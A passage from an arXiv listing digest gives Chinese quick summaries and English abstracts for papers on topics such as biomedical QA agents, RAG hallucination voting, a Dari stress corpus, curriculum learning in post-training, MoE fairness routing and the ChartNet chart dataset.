Abstract:Vision-language models (VLMs) excel at image-text retrieval yet persistently fail at compositional reasoning, distinguishing captions that share the same words but differ in relational structure. We present, a unified evaluation and augmentation framework benchmarking four architecturally diverse VLMs,CLIP, BLIP, LLaVA, and Qwen3-VL-8B-Thinking,on the Winoground benchmark under plain and scene-graph-augmented regimes. We introduce a dependency-based TextSceneGraphParser (spaCy) extracting subject-relation-object triples, and a Graph Asymmetry Scorer using optimal bipartite matching to inject structural relational priors. Caption ablation experiments (subject-object masking and swapping) reveal that Qwen3-VL-8B-Thinking achieves a group score of 62.75, far above all encoder-based models, while a proposed multi-turn SG filtering strategy further lifts it to 66.0, surpassing prior open-source state-of-the-art. We analyze the capability augmentation tradeoff and find that SG augmentation benefits already capable models while providing negligible or negative gains for weaker baselines. Code: this https URL
[NLP-67] PubMed Reason er: Dynamic Reasoning -based Retrieval for Evidence-Grounded Biomedical Question Answering
【速读】: 该论文旨在解决生物医学问答(Biomedical Question Answering, QA)系统在提供准确答案的同时,缺乏可验证证据支持和迭代优化能力的问题。现有检索增强方法难以动态改进初始查询质量,而自反思机制又仅在完整检索后才启动,导致效率与准确性受限。其解决方案的关键在于提出一种三阶段的生物医学QA代理——PubMed Reasoner:首先通过自我批判式查询优化(self-critic query refinement)基于部分元数据检索结果调整MeSH术语以提升查询覆盖度、对齐性和去重性;其次采用批处理式反思检索(reflective retrieval)持续获取文献直至满足证据充分性;最后生成基于证据的回答(evidence-grounded response generation),附带明确引用。该架构结合了检索优先的推理策略与大语言模型(LLM)驱动的判断机制,在PubMedQA上达到78.32%准确率,略优于人类专家,并在多个评估维度上展现出更强的推理合理性、证据锚定性、临床相关性及可信度。
链接: https://arxiv.org/abs/2603.27335
作者: Yiqing Zhang,Xiaozhong Liu,Fabricio Murai
机构: PayPal( PayPal); Worcester Polytechnic Institute (伍斯特理工学院)
类目: Computation and Language (cs.CL)
备注: 20 pages; under review
Abstract:Trustworthy biomedical question answering (QA) systems must not only provide accurate answers but also justify them with current, verifiable evidence. Retrieval-augmented approaches partially address this gap but lack mechanisms to iteratively refine poor queries, whereas self-reflection methods kick in only after full retrieval is completed. In this context, we introduce PubMed Reasoner, a biomedical QA agent composed of three stages: self-critic query refinement evaluates MeSH terms for coverage, alignment, and redundancy to enhance PubMed queries based on partial (metadata) retrieval; reflective retrieval processes articles in batches until sufficient evidence is gathered; and evidence-grounded response generation produces answers with explicit citations. PubMed Reasoner with a GPT-4o backbone achieves 78.32% accuracy on PubMedQA, slightly surpassing human experts, and showing consistent gains on MMLU Clinical Knowledge. Moreover, LLM-as-judge evaluations prefer our responses across: reasoning soundness, evidence grounding, clinical relevance, and trustworthiness. By orchestrating retrieval-first reasoning over authoritative sources, our approach provides practical assistance to clinicians and biomedical researchers while controlling compute and token costs.
[NLP-68] SACRED: A Faithful Annotated Multimedia Multimodal Multilingual Dataset for Classifying Connectedness Types in Online Spirituality LREC
【速读】: 该论文旨在解决宗教与神学研究中精神层面(spirituality)概念在跨文化语境下难以量化分析的问题,尤其针对社会科学研究中高质量多模态数据集稀缺的困境。其解决方案的关键在于与社会科学家合作构建了首个面向在线灵性交流的标注多模态数据集SACRED,该数据集确保分类标签的忠实性,并在此基础上系统评估了13种主流大语言模型(LLM)及传统规则和微调方法在抽象概念识别中的表现,发现DeepSeek-V3在文本分类任务中表现最优(Quora测试集准确率79.19%),而GPT-4o-mini在视觉任务中领先(F1分数63.99%)。这一成果为灵性通信研究提供了可复现的数据基础与方法论支持。
链接: https://arxiv.org/abs/2603.27331
作者: Qinghao Guan,Yuchen Pan,Donghao Li,Zishi Zhang,Yiyang Chen,Lu Li,Flaminia Canu,Emilia Volkart,Gerold Schneider
机构: 未知
类目: Computation and Language (cs.CL); Multimedia (cs.MM)
备注: Accepted by LLMs4SSH 2026 at LREC
Abstract:In religion and theology studies, spirituality has garnered significant research attention for the reason that it not only transcends culture but offers unique experience to each individual. However, social scientists often rely on limited datasets, which are basically unavailable online. In this study, we collaborated with social scientists to develop a high-quality multimedia multi-modal datasets, \textbfSACRED, in which the faithfulness of classification is guaranteed. Using \textbfSACRED, we evaluated the performance of 13 popular LLMs as well as traditional rule-based and fine-tuned approaches. The result suggests DeepSeek-V3 model performs well in classifying such abstract concepts (i.e., 79.19% accuracy in the Quora test set), and the GPT-4o-mini model surpassed the other models in the vision tasks (63.99% F1 score). Purportedly, this is the first annotated multi-modal dataset from online spirituality communication. Our study also found a new type of connectedness which is valuable for communication science studies.
[NLP-69] Self-evolving AI agents for protein discovery and directed evolution
【速读】: 该论文旨在解决蛋白质科学发现中因人工协调信息与算法而导致的瓶颈问题,以及通用智能体在复杂领域项目中表现不足的局限性。其解决方案的关键在于提出VenusFactory2这一自主框架,通过自演化多智能体基础设施实现从静态工具调用到动态工作流合成的转变,从而仅凭单一自然语言提示即可自主完成蛋白质的发现与优化流程。
链接: https://arxiv.org/abs/2603.27303
作者: Yang Tan,Lingrong Zhang,Mingchen Li,Yuanxi Yu,Bozitao Zhong,Bingxin Zhou,Nanqing Dong,Liang Hong
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Quantitative Methods (q-bio.QM)
备注: 100 pages, 6 figures
Abstract:Protein scientific discovery is bottlenecked by the manual orchestration of information and algorithms, while general agents are insufficient in complex domain projects. VenusFactory2 provides an autonomous framework that shifts from static tool usage to dynamic workflow synthesis via a self-evolving multi-agent infrastructure to address protein-related demands. It outperforms a set of well-known agents on the VenusAgentEval benchmark, and autonomously organizes the discovery and optimization of proteins from a single natural language prompt.
[NLP-70] Mitigating Hallucination on Hallucination in RAG via Ensemble Voting
【速读】: 该论文旨在解决检索增强生成(Retrieval-Augmented Generation, RAG)系统中“幻觉叠加”(hallucination on hallucination)的问题,即由于检索结果本身存在错误或偏差,导致生成模型基于这些错误信息进一步产生更严重的幻觉。解决方案的关键在于提出一种无需训练的两阶段投票框架VOTE-RAG:第一阶段为检索投票(Retrieval Voting),多个代理并行生成多样化查询,并聚合所有检索到的文档;第二阶段为响应投票(Response Voting),多个代理独立基于聚合后的文档生成答案,最终输出由多数投票决定。该方法通过简单而可靠的集成投票机制,在不引入问题漂移(problem drift)风险的前提下,显著提升了RAG系统的鲁棒性和准确性。
链接: https://arxiv.org/abs/2603.27253
作者: Zequn Xie,Zhengyang Sun
机构: 未知
类目: Computation and Language (cs.CL)
备注: arXiv admin note: text overlap with arXiv:2505.18581 by other authors
Abstract:Retrieval-Augmented Generation (RAG) aims to reduce hallucinations in Large Language Models (LLMs) by integrating external knowledge. However, RAG introduces a critical challenge: hallucination on hallucination," where flawed retrieval results mislead the generation model, leading to compounded hallucinations. To address this issue, we propose VOTE-RAG, a novel, training-free framework with a two-stage structure and efficient, parallelizable voting mechanisms. VOTE-RAG includes: (1) Retrieval Voting, where multiple agents generate diverse queries in parallel and aggregate all retrieved documents; (2) Response Voting, where multiple agents independently generate answers based on the aggregated documents, with the final output determined by majority vote. We conduct comparative experiments on six benchmark datasets. Our results show that VOTE-RAG achieves performance comparable to or surpassing more complex frameworks. Additionally, VOTE-RAG features a simpler architecture, is fully parallelizable, and avoids the problem drift" risk. Our work demonstrates that simple, reliable ensemble voting is a superior and more efficient method for mitigating RAG hallucinations.
[NLP-71] SCOPE: Tree-based Self-Correcting Online Log Parsing via Syntactic-Semantic Collaboration
【速读】: 该论文旨在解决日志解析(log parsing)中传统启发式方法准确率低与基于大语言模型(LLM)的方法延迟高的矛盾问题。其关键解决方案是提出SCOPE,一种自校正的在线日志解析方法,通过引入双向树结构实现从正向和反向的高效模板匹配,提升整体匹配率;同时采用两阶段语法语义协同框架——首先利用轻量级自然语言处理(NLP)模型结合词性标注(POS)进行语法层面匹配,仅在存在不确定性时才调用LLM作为后援处理语义复杂案例,从而显著减少LLM API调用次数,在保持高准确率的同时大幅提升效率。
链接: https://arxiv.org/abs/2603.27247
作者: Dongyi Fan,Suqiong Zhang,Lili He,Ming Liu,Yifan Huo
机构: Zhejiang Sci-Tech University (浙江理工大学)
类目: Computation and Language (cs.CL); Software Engineering (cs.SE)
备注: Accepted at the 34th International Conference on Program Comprehension (ICPC 2026)
Abstract:Log parsing is a critical step for automated log analysis in complex systems. Traditional heuristic-based methods offer high efficiency but are limited in accuracy due to overlooking semantic context. In contrast, recent LLM-based parsers improve accuracy via se mantic understanding but incur high latency from frequent model calls. To address this, we propose SCOPE, the first self-correcting online log parsing method that integrates the strengths of both heuristic and LLM-based paradigms. SCOPE introduces a novel bi-directional tree structure that enables efficient template match ing from both forward and reverse directions, resulting in a higher overall matching rate. Additionally, it adopts a two-stage syntactic semantic collaboration framework: a lightweight NLP model first utilizes part-of-speech (POS) information for syntax-based match ing, while the LLM is selectively invoked as a fallback to handle semantically complex cases when uncertainty remains. This design significantly reduces LLM API usage while maintaining high ac curacy, achieving a balance between efficiency and effectiveness. Extensive evaluations on diverse benchmark datasets show that SCOPE outperforms state-of-the-art methods in both accuracy and efficiency. The implementation and datasets are publicly released to facilitate further research.
[NLP-72] Structural Stress and Learned Helplessness in Afghanistan: A Multi-Layer Analysis of the AFSTRESS Dari Corpus
【速读】: 该论文旨在解决在阿富汗人道主义危机背景下,缺乏针对达里语(Dari)自述压力叙事的多标签语料库问题,从而推动对压力源、情绪状态及心理机制(如习得性无助、慢性压力和情感级联模式)的跨层次分析。其解决方案的关键在于构建了AFSTRESS——首个达里语自述压力叙事多标签语料库,包含737份来自阿富汗个体的响应,涵盖12个二元标签(5种情绪与7种压力源),具有高标签基数(5.54)和密度(0.462),反映了复杂且多维的压力特征;同时通过字符级TF-IDF结合线性支持向量机(Linear SVM)实现了基准性能(Micro-F1 = 0.663,Macro-F1 = 0.651),并验证了阈值调优可显著提升模型效果(Micro-F1提升10.3点),为计算语言学、社会结构分析与心理学建模提供了首个可扩展的数据资源与方法框架。
链接: https://arxiv.org/abs/2603.27233
作者: Jawid Ahmad Baktash,Mursal Dawodi,Nadira Ahmadi
机构: 未知
类目: Computation and Language (cs.CL); Social and Information Networks (cs.SI)
备注: 16 pages, 7 figures, 3 tables. Introduces AFSTRESS, the first multi-label Dari corpus of self-reported stress narratives (737 responses). Includes computational benchmarks, social science analysis of structural stress, and psychological modeling (learned helplessness, chronic stress, emotional cascade)
Abstract:We introduce AFSTRESS, the first multi-label corpus of self-reported stress narratives in Dari (Eastern Persian), comprising 737 responses collected from Afghan individuals during an ongoing humanitarian crisis. Participants describe experienced stress and select emotion and stressor labels via Dari checklists. The dataset enables analysis at three levels: computational (multi-label classification), social (structural drivers and gender disparities), and psychological (learned helplessness, chronic stress, and emotional cascade patterns). It includes 12 binary labels (5 emotions, 7 stressors), with high label cardinality (5.54) and density (0.462), reflecting complex, multi-dimensional stress. Structural stressors dominate: uncertain future (62.6 percent) and education closure (60.0 percent) exceed emotional states, indicating stress is primarily structurally driven. The strongest co-occurrence is between hopelessness and uncertain future (J = 0.388). Baseline experiments show that character TF-IDF with Linear SVM achieves Micro-F1 = 0.663 and Macro-F1 = 0.651, outperforming ParsBERT and XLM-RoBERTa, while threshold tuning improves Micro-F1 by 10.3 points. AFSTRESS provides the first Dari resource for computational analysis of stress and well-being in a crisis-affected population. Comments: 16 pages, 7 figures, 3 tables. Introduces AFSTRESS, the first multi-label Dari corpus of self-reported stress narratives (737 responses). Includes computational benchmarks, social science analysis of structural stress, and psychological modeling (learned helplessness, chronic stress, emotional cascade) Subjects: Computation and Language (cs.CL); Social and Information Networks (cs.SI) ACMclasses: I.2.7; H.3.1; J.4; I.5.4 Cite as: arXiv:2603.27233 [cs.CL] (or arXiv:2603.27233v1 [cs.CL] for this version) https://doi.org/10.48550/arXiv.2603.27233 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Jawid Ahmad Baktash [view email] [v1] Sat, 28 Mar 2026 11:04:53 UTC (3,772 KB) Full-text links: Access Paper: View a PDF of the paper titled Structural Stress and Learned Helplessness in Afghanistan: A Multi-Layer Analysis of the AFSTRESS Dari Corpus, by Jawid Ahmad Baktash and 2 other authorsView PDFHTML (experimental)TeX Source view license Current browse context: cs.CL prev | next new | recent | 2026-03 Change to browse by: cs cs.SI References Citations NASA ADSGoogle Scholar Semantic Scholar export BibTeX citation Loading… BibTeX formatted citation loading… Data provided by: Bookmark checked=“checked”> Bibliographic Tools Bibliographic and Citation Tools Bibliographic Explorer Toggle Bibliographic Explorer (What is the Explorer?) Connected Papers Toggle Connected Papers (What is Connected Papers?) Litmaps Toggle Litmaps (What is Litmaps?) scite.ai Toggle scite Smart Citations (What are Smart Citations?) Code, Data, Media Code, Data and Media Associated with this Article alphaXiv Toggle alphaXiv (What is alphaXiv?) Links to Code Toggle CatalyzeX Code Finder for Papers (What is CatalyzeX?) DagsHub Toggle DagsHub (What is DagsHub?) GotitPub Toggle Gotit.pub (What is GotitPub?) Huggingface Toggle Hugging Face (What is Huggingface?) Links to Code Toggle Papers with Code (What is Papers with Code?) ScienceCast Toggle ScienceCast (What is ScienceCast?) Demos Demos Replicate Toggle Replicate (What is Replicate?) Spaces Toggle Hugging Face Spaces (What is Spaces?) Spaces Toggle TXYZ.AI (What is TXYZ.AI?) Related Papers Recommenders and Search Tools Link to Influence Flower Influence Flower (What are Influence Flowers?) Core recommender toggle CORE Recommender (What is CORE?) Author Venue Institution Topic About arXivLabs arXivLabs: experimental projects with community collaborators arXivLabs is a framework that allows collaborators to develop and share new arXiv features directly on our website. Both individuals and organizations that work with arXivLabs have embraced and accepted our values of openness, community, excellence, and user data privacy. arXiv is committed to these values and only works with partners that adhere to them. Have an idea for a project that will add value for arXiv’s community? Learn more about arXivLabs. Which authors of this paper are endorsers? | Disable MathJax (What is MathJax?) mathjaxToggle(); About Help contact arXivClick here to contact arXiv Contact subscribe to arXiv mailingsClick here to subscribe Subscribe Copyright Privacy Policy Web Accessibility Assistance arXiv Operational Status
[NLP-73] Rethinking Easy-to-Hard: Limits of Curriculum Learning in Post-Training for Deductive Reasoning
【速读】: 该论文旨在解决课程学习(Curriculum Learning, CL)在大语言模型(Large Language Models, LLMs)后训练阶段对组合推理任务是否真正有效的问题。传统观点认为,按难度递增顺序组织训练样本有助于提升模型的泛化能力,尤其在涉及复杂推理任务时;然而,这一假设在组合推理场景下的实证支持不足。论文的关键解决方案是设计了一套系统性的实证研究,采用合成算术和逻辑基准测试,以推理复杂度而非表面特征作为难度指标,对比了基于难度排序的课程学习与标准随机采样策略在监督微调(Supervised Fine-Tuning, SFT)和强化学习(Reinforcement Learning, RL)两种训练范式下的性能差异。结果表明,在准确率和响应长度上均未发现课程学习具有显著优势,从而揭示出在演绎推理任务中,训练样本的具体排序对实现组合泛化几乎无影响,挑战了课程学习在后训练阶段的实际价值。
链接: https://arxiv.org/abs/2603.27226
作者: Maximilian Mordig,Andreas Opedal,Weiyang Liu,Bernhard Schölkopf
机构: Max Planck Institute for Intelligent Systems, Tübingen (马克斯普朗克智能系统研究所, 图宾根); ETH Zürich (苏黎世联邦理工学院); The Chinese University of Hong Kong (香港中文大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Curriculum learning (CL), motivated by the intuition that learning in increasing order of difficulty should ease generalization, is commonly adopted both in pre-training and post-training of large language models (LLMs). The intuition of CL is particularly compelling for compositional reasoning, where complex problems are built from elementary inference rules; however, the actual impact of CL on such tasks remains largely underexplored. We present a systematic empirical study of CL for post-training of LLMs, using synthetic arithmetic and logical benchmarks where difficulty is characterized by reasoning complexity rather than surface-level proxies. Surprisingly, across multiple model families and curriculum schedules, we find no robust advantage in difficulty-based sequencing over standard random sampling in either accuracy or response length. These findings persist across both supervised fine-tuning (SFT) and reinforcement learning (RL) methods. Our study suggests that, in the context of deductive reasoning, the specific ordering of training examples plays a negligible role in achieving compositional generalization, challenging the practical utility of curriculum-based post-training.
[NLP-74] LightMover: Generative Light Movement with Color and Intensity Controls CVPR2026
【速读】: 该论文旨在解决单张图像中可控光照编辑的问题,即在不重新渲染场景的前提下,实现对光源位置、颜色和强度的精确控制,并生成物理上合理的阴影、反射和衰减效果。解决方案的关键在于提出 LightMover 框架,其将光照编辑建模为视觉 token 空间中的序列到序列预测问题,利用视频扩散先验(video diffusion priors)学习光照变化与场景响应之间的映射关系;同时引入自适应 token 剪枝机制,在保留空间信息的同时压缩非空间属性编码,使控制序列长度减少 41% 而不损失编辑保真度,从而实现高效且物理合理的光照操控。
链接: https://arxiv.org/abs/2603.27209
作者: Gengze Zhou,Tianyu Wang,Soo Ye Kim,Zhixin Shu,Xin Yu,Yannick Hold-Geoffroy,Sumit Chaturvedi,Qi Wu,Zhe Lin,Scott Cohen
机构: AIML, Adelaide University; Adobe Research; University of Hong Kong; Yale University
类目: Computer Vision and Pattern Recognition (cs.CV); Computation and Language (cs.CL); Graphics (cs.GR); Machine Learning (cs.LG)
备注: CVPR 2026. 10 pages, 5 figures, 6 tables in main paper; supplementary material included
Abstract:We present LightMover, a framework for controllable light manipulation in single images that leverages video diffusion priors to produce physically plausible illumination changes without re-rendering the scene. We formulate light editing as a sequence-to-sequence prediction problem in visual token space: given an image and light-control tokens, the model adjusts light position, color, and intensity together with resulting reflections, shadows, and falloff from a single view. This unified treatment of spatial (movement) and appearance (color, intensity) controls improves both manipulation and illumination understanding. We further introduce an adaptive token-pruning mechanism that preserves spatially informative tokens while compactly encoding non-spatial attributes, reducing control sequence length by 41% while maintaining editing fidelity. To train our framework, we construct a scalable rendering pipeline that generates large numbers of image pairs across varied light positions, colors, and intensities while keeping the scene content consistent with the original image. LightMover enables precise, independent control over light position, color, and intensity, and achieves high PSNR and strong semantic consistency (DINO, CLIP) across different tasks.
[NLP-75] daVinci-LLM :Towards the Science of Pretraining
【速读】: 该论文旨在解决预训练(pretraining)阶段在大模型能力构建中的关键作用长期被忽视的问题,即当前研究普遍依赖后训练(post-training)优化,而未能系统性地探索预训练本身对模型能力上限的决定性影响。其解决方案的核心在于通过一个工业级算力与完全科研自由相结合的开放范式(daVinci-LLM),实现从数据处理到训练过程的全流程透明化,首次将“数据达尔文主义”(Data Darwinism)框架引入预训练研究,提出一套从过滤到合成的L0-L9分层分类方法,并设计两阶段自适应课程学习策略,结合200余次受控消融实验,揭示了数据处理深度、领域饱和动态、组合平衡等维度对模型能力提升的系统性影响,从而为预训练科学提供了可复现、可积累的方法论基础。
链接: https://arxiv.org/abs/2603.27164
作者: Yiwei Qin,Yixiu Liu,Tiantian Mi,Muhang Xie,Zhen Huang,Weiye Si,Pengrui Lu,Siyuan Feng,Xia Wu,Liming Liu,Ye Luo,Jinlong Hou,Qipeng Guo,Yu Qiao,Pengfei Liu
机构: 未知
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:The foundational pretraining phase determines a model’s capability ceiling, as post-training struggles to overcome capability foundations established during pretraining, yet it remains critically under-explored. This stems from a structural paradox: organizations with computational resources operate under commercial pressures that inhibit transparent disclosure, while academic institutions possess research freedom but lack pretraining-scale computational resources. daVinci-LLM occupies this unexplored intersection, combining industrial-scale resources with full research freedom to advance the science of pretraining. We adopt a fully-open paradigm that treats openness as scientific methodology, releasing complete data processing pipelines, full training processes, and systematic exploration results. Recognizing that the field lacks systematic methodology for data processing, we employ the Data Darwinism framework, a principled L0-L9 taxonomy from filtering to synthesis. We train a 3B-parameter model from random initialization across 8T tokens using a two-stage adaptive curriculum that progressively shifts from foundational capabilities to reasoning-intensive enhancement. Through 200+ controlled ablations, we establish that: processing depth systematically enhances capabilities, establishing it as a critical dimension alongside volume scaling; different domains exhibit distinct saturation dynamics, necessitating adaptive strategies from proportion adjustments to format shifts; compositional balance enables targeted intensification while preventing performance collapse; how evaluation protocol choices shape our understanding of pretraining progress. By releasing the complete exploration process, we enable the community to build upon our findings and systematic methodologies to form accumulative scientific knowledge in pretraining.
[NLP-76] Learning to Predict Future-Aligned Research Proposals with Language Models
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在科研创意生成中缺乏有效评估机制的问题,尤其是如何自动衡量生成研究提案的创新性(novelty)与合理性(soundness),而传统大规模人工评估成本高昂。其核心解决方案是将提案生成重构为一个时间切片的科学预测任务:给定截止时间前可用的研究问题和启发文献,模型生成结构化提案,并通过其是否能提前预测后续发表论文中出现的研究方向来评估质量。关键创新在于提出未来对齐分数(Future Alignment Score, FAS),利用检索和LLM语义评分机制,在保留时间一致性的数据集上量化模型对未来研究趋势的预判能力,从而实现高效、可验证的模型优化与评估。
链接: https://arxiv.org/abs/2603.27146
作者: Heng Wang,Pengcheng Jiang,Jiashuo Sun,Zhiyi Shi,Haofei Yu,Jiawei Han,Heng Ji
机构: University of Illinois Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校)
类目: Computation and Language (cs.CL)
备注:
Abstract:Large language models (LLMs) are increasingly used to assist ideation in research, but evaluating the quality of LLM-generated research proposals remains difficult: novelty and soundness are hard to measure automatically, and large-scale human evaluation is costly. We propose a verifiable alternative by reframing proposal generation as a time-sliced scientific forecasting problem. Given a research question and inspiring papers available before a cutoff time, the model generates a structured proposal and is evaluated by whether it anticipates research directions that appear in papers published after the time. We operationalize this objective with the Future Alignment Score (FAS), computed via retrieval and LLM-based semantic scoring against a held-out future corpus. To train models, we build a time-consistent dataset of 17,771 papers from targets and their pre-cutoff citations, and synthesize reasoning traces that teach gap identification and inspiration borrowing. Across Llama-3.1 and Qwen2.5 models, future-aligned tuning improves future alignment over unaligned baselines (up to +10.6% overall FAS), and domain-expert human evaluation corroborates improved proposal quality. Finally, we demonstrate practical impact by implementing two model-generated proposals with a code agent, obtaining 4.17% accuracy gain on MATH from a new prompting strategy and consistent improvements for a novel model-merging method.
[NLP-77] Routing Sensitivity Without Controllability: A Diagnostic Study of Fairness in MoE Language Models
【速读】: 该论文旨在解决混合专家(Mixture-of-Experts, MoE)语言模型在路由层面存在对人口统计学内容的敏感性,但如何利用这种敏感性实现公平性控制仍面临结构性限制的问题。解决方案的关键在于提出公平感知路由均衡(Fairness-Aware Routing Equilibrium, FARE)诊断框架,通过系统性评估不同MoE架构下路由级刻板印象干预的可行性与有效性,揭示路由偏好调整在某些模型中不可实现、统计上不稳健或伴随显著性能代价(如OLMoE在CrowS-Pairs指标上下降4.4个百分点),且即使在对数似然层面偏好变化稳定,也无法转化为生成层面的公平性改善——根本原因在于群体层面的专家掩码显示偏见与核心知识在专家组内深度纠缠。这表明路由敏感性虽为必要条件,但不足以实现有效的刻板印象控制,并指出了未来更可控MoE系统设计所需的具体架构条件。
链接: https://arxiv.org/abs/2603.27141
作者: Junhyeok Lee,Kyu Sung Choi
机构: Seoul National University College of Medicine (首尔国立大学医学院); Seoul National University Hospital (首尔国立大学医院); Healthcare AI Research Institute, Seoul National University Hospital (首尔国立大学医院健康AI研究所)
类目: Computation and Language (cs.CL)
备注: 10 pages, 2 figures, 8 tables
Abstract:Mixture-of-Experts (MoE) language models are universally sensitive to demographic content at the routing level, yet exploiting this sensitivity for fairness control is structurally limited. We introduce Fairness-Aware Routing Equilibrium (FARE), a diagnostic framework designed to probe the limits of routing-level stereotype intervention across diverse MoE architectures. FARE reveals that routing-level preference shifts are either unachievable (Mixtral, Qwen1.5, Qwen3), statistically non-robust (DeepSeekMoE), or accompanied by substantial utility cost (OLMoE, -4.4%p CrowS-Pairs at -6.3%p TQA). Critically, even where log-likelihood preference shifts are robust, they do not transfer to decoded generation: expanded evaluations on both non-null models yield null results across all generation metrics. Group-level expert masking reveals why: bias and core knowledge are deeply entangled within expert groups. These findings indicate that routing sensitivity is necessary but insufficient for stereotype control, and identify specific architectural conditions that can inform the design of more controllable future MoE systems.
[NLP-78] Story2Proposal: A Scaffold for Structured Scientific Paper Writing
【速读】: 该论文旨在解决生成式 AI (Generative AI) 在科学文献撰写过程中因缺乏结构化约束而导致的文档生命周期内叙事逻辑、实验证据与可视化元素之间出现不一致的问题,例如结构漂移、图表缺失或跨章节矛盾。其解决方案的关键在于提出一种基于契约(contract)的多智能体框架 Story2Proposal,通过一组协作智能体(架构师、写作者、精炼者和渲染器)围绕一个持久的共享视觉契约状态运行,该契约持续追踪章节结构和注册的视觉元素;同时引入评估智能体在“生成-评估-适应”循环中提供反馈并动态更新契约,从而实现对生成内容的结构一致性与视觉对齐性的有效控制。
链接: https://arxiv.org/abs/2603.27065
作者: Zhuoyang Qian,Wei Shi,Xu Lin,Li Ling,Meng Luo,Ziming Wang,Zhiwei Zhang,Tengyue Xu,Gaoge Liu,Zhentao Zhang,Shuo Zhang,Ziqi Wang,Zheng Feng,Yan Luo,Shu Xu,Yongjin Chen,Zhibo Feng,Zhuo Chen,Bruce Yuan,Biao Wu,Harry Wang,Kris Chen
机构: 未知
类目: Computation and Language (cs.CL)
备注: 10 pages, 4 figures,
Abstract:Generating scientific manuscripts requires maintaining alignment between narrative reasoning, experimental evidence, and visual artifacts across the document lifecycle. Existing language-model generation pipelines rely on unconstrained text synthesis with validation applied only after generation, often producing structural drift, missing figures or tables, and cross-section inconsistencies. We introduce Story2Proposal, a contract-governed multi-agent framework that converts a research story into a structured manuscript through coordinated agents operating under a persistent shared visual contract. The system organizes architect, writer, refiner, and renderer agents around a contract state that tracks section structure and registered visual elements, while evaluation agents supply feedback in a generate evaluate adapt loop that updates the contract during generation. Experiments on tasks derived from the Jericho research corpus show that Story2Proposal achieved an expert evaluation score of 6.145 versus 3.963 for DirectChat (+2.182) across GPT, Claude, Gemini, and Qwen backbones. Compared with the structured generation baseline Fars, Story2Proposal obtained an average score of 5.705 versus 5.197, indicating improved structural consistency and visual alignment.
[NLP-79] ChartNet: A Million-Scale High-Quality Multimodal Dataset for Robust Chart Understanding CVPR2026
【速读】: 该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在图表理解与推理能力上的局限性,即模型难以联合处理几何视觉模式、结构化数值数据和自然语言信息以实现对图表的深入理解。其解决方案的关键在于构建ChartNet——一个高质量、百万规模的多模态数据集,通过代码引导的合成流水线生成150万张涵盖24种图表类型和6个绘图库的多样化样本,每个样本包含渲染图像、数据表格、自然语言摘要、问答对及推理链,实现细粒度跨模态对齐,并辅以严格的质量过滤机制保障视觉保真度、语义准确性和多样性,从而为多模态大模型提供大规模监督信号,提升其在数据可视化理解任务中的泛化能力和鲁棒性。
链接: https://arxiv.org/abs/2603.27064
作者: Jovana Kondic,Pengyuan Li,Dhiraj Joshi,Isaac Sanchez,Ben Wiesel,Shafiq Abedin,Amit Alfassy,Eli Schwartz,Daniel Caraballo,Yagmur Gizem Cinar,Florian Scheidegger,Steven I. Ross,Daniel Karl I. Weidele,Hang Hua,Ekaterina Arutyunova,Roei Herzig,Zexue He,Zihan Wang,Xinyue Yu,Yunfei Zhao,Sicong Jiang,Minghao Liu,Qunshu Lin,Peter Staar,Luis Lastras,Aude Oliva,Rogerio Feris
机构: MIT(麻省理工学院); MIT-IBM Watson AI Lab(麻省理工-IBM沃森人工智能实验室); IBM Research(IBM研究院); Abaka AI
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Accepted at CVPR 2026
Abstract:Understanding charts requires models to jointly reason over geometric visual patterns, structured numerical data, and natural language – a capability where current vision-language models (VLMs) remain limited. We introduce ChartNet, a high-quality, million-scale multimodal dataset designed to advance chart interpretation and reasoning. ChartNet leverages a novel code-guided synthesis pipeline to generate 1.5 million diverse chart samples spanning 24 chart types and 6 plotting libraries. Each sample consists of five aligned components: plotting code, rendered chart image, data table, natural language summary, and question-answering with reasoning, providing fine-grained cross-modal alignment. To capture the full spectrum of chart comprehension, ChartNet additionally includes specialized subsets encompassing human annotated data, real-world data, safety, and grounding. Moreover, a rigorous quality-filtering pipeline ensures visual fidelity, semantic accuracy, and diversity across chart representations. Fine-tuning on ChartNet consistently improves results across benchmarks, demonstrating its utility as large-scale supervision for multimodal models. As the largest open-source dataset of its kind, ChartNet aims to support the development of foundation models with robust and generalizable capabilities for data visualization understanding. The dataset is publicly available at this https URL
[NLP-80] Debiasing Large Language Models toward Social Factors in Online Behavior Analytics through Prompt Knowledge Tuning
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在社会情境下因缺乏对个体行为归因机制的建模而产生的偏见问题,即模型在推理过程中未能有效区分行为是由个人特质( dispositional causality)还是情境因素(situational causality)驱动,从而导致对社交内容的理解偏差。解决方案的关键在于引入一种可扩展的提示增强方法,通过将用户意图作为知识源以推断个人归因,并结合消息上下文以推断情境归因,从而在零样本分类任务中提升模型性能并降低社会归因偏差。该方法在灾难领域社交媒体的意图识别和主题检测任务中展现出跨灾害类型与多语言场景下的有效性,并验证了Llama3、Mistral和Gemma等开源模型的社会归因偏见及其缓解策略的有效性。
链接: https://arxiv.org/abs/2603.27057
作者: Hossein Salemi,Jitin Krishnan,Hemant Purohit
机构: George Mason University (乔治梅森大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: This is a preprint of the accepted paper for publication in IEEE Transactions on Computational Social Systems
Abstract:Attribution theory explains how individuals interpret and attribute others’ behavior in a social context by employing personal (dispositional) and impersonal (situational) causality. Large Language Models (LLMs), trained on human-generated corpora, may implicitly mimic this social attribution process in social contexts. However, the extent to which LLMs utilize these causal attributions in their reasoning remains underexplored. Although using reasoning paradigms, such as Chain-of-Thought (CoT), has shown promising results in various tasks, ignoring social attribution in reasoning could lead to biased responses by LLMs in social contexts. In this study, we investigate the impact of incorporating a user’s goal as knowledge to infer dispositional causality and message context to infer situational causality on LLM performance. To this end, we introduce a scalable method to mitigate such biases by enriching the instruction prompts for LLMs with two prompt aids using social-attribution knowledge, based on the context and goal of a social media message. This method improves the model performance while reducing the social-attribution bias of the LLM in the reasoning on zero-shot classification tasks for behavior analytics applications. We empirically show the benefits of our method across two tasks-intent detection and theme detection on social media in the disaster domain-when considering the variability of disaster types and multiple languages of social media. Our 